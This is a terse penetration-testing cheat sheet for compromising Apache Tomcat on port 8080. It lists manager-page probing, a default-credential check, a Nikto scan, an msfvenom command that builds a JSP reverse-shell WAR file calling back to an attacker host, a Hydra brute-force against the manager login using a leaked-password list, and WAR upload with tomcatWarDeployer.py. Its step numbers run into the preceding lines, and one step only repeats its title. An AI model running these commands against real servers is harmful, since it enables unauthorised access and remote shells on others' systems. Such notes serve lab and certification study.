Tomcat 8080
1. Check Default Directories
http://10.10.10.10:8080/manager
http://10.10.10.10:8080/manager.html2. Check for Default Credentials
3. Run Nikto Scan
nikto -h http://10.10.10.10:80804. Generate Reverse Shell Payload
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.112 LPORT=1234 -f war -o shelly.war5. Brute Force with Hydra
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.10 http-get /manager/html6. Using tomcatWarDeployer.py for Upload
tomcatWarDeployer.py for Upload7. Metasploit Scanner for Tomcat
Last updated